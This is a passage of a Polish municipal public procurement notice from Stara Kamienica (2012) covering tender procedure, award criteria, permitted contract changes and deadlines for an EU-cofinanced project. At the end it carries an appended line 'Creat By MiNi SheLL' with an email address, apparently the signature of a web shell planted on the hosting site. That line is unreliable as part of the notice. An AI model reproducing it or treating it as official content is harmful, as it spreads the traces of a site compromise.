<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający  przewiduje możliwość zmiany zawartej  umowy w przypadku:
1.	zmiany kluczowego personelu wykonawcy wskazanego w ofercie do realizacji przedmiotu zamówienia na osobę (y)  spełniającą (e) co najmniej warunki podmiotowe określone w Cz.I. IDW ,
2.	zmiana lub konieczność  dodatkowego wprowadzenia na plac budowy - podwykonawcy,
3.	rezygnacji z wykonania pełnego zakresu rzeczowego objętego zamówieniem w przypadku zaistnienia  okoliczności,       w których zbędne będzie wykonanie danej części zamówienia, wraz  z jednoczesnym związanym z tym obniżeniem wynagrodzenia, w oparciu o dostarczony kosztorys ofertowy  przed podpisaniem umowy,
4.	wprowadzenia robót zamiennych podczas realizacji umowy wynikających z rzeczywistych warunków występujących      w   trakcie realizacji prac - nie powodujących zmian  w wysokości ceny umownej  wpisanej do umowy,
5.	wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających   wykonanie robót zgodnie z zasadami wiedzy technicznej, obowiązującymi przepisami i warunkami technologicznymi określonymi dla robót, które miałyby być wykonane w tych warunkach;  konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych, technologicznych lub materiałowych niż wskazane w Dokumentacji projektowej  w sytuacji,  gdyby zastosowanie dotychczasowych rozwiązań groziło nie wykonaniem lub wadliwym  wykonaniem projektu - dotyczy możliwości  wydłużenia terminu realizacji zakończenia i lub zmiany wynagrodzenia na zasadach określonych w punktach  b), c),  d).
2.	Zmiany umowy nie wymaga: zmiana danych teleadresowych, zmiana osób wskazanych do   kontaktów między stronami umowy, zmiana danych związanych z obsługą administracyjno-organizacyjną umowy  (np. zmiana rachunku bankowego).
3.	 O interpretacji zdarzenia siły wyższej i ewentualnym uznaniu przedłużenia terminu wykonania robót  z tego powodu, będzie decydował Wójt Gminy,  w trakcie realizacji robót, po złożeniu pisemnego wniosku Wykonawcy .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://stara-kamienica.bipgmina.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Starej Kamienicy
58-512 Stara Kamienica 41

pok.12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.11.2012 godzina 13:00, miejsce: Urząd Gminy w Starej Kamienicy
58-512 Stara Kamienica 41

pok.16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 2.	Projekt jest współfinansowany ze środków Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach programu ,,Odnowa i rozwój wsi objętego PROW 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com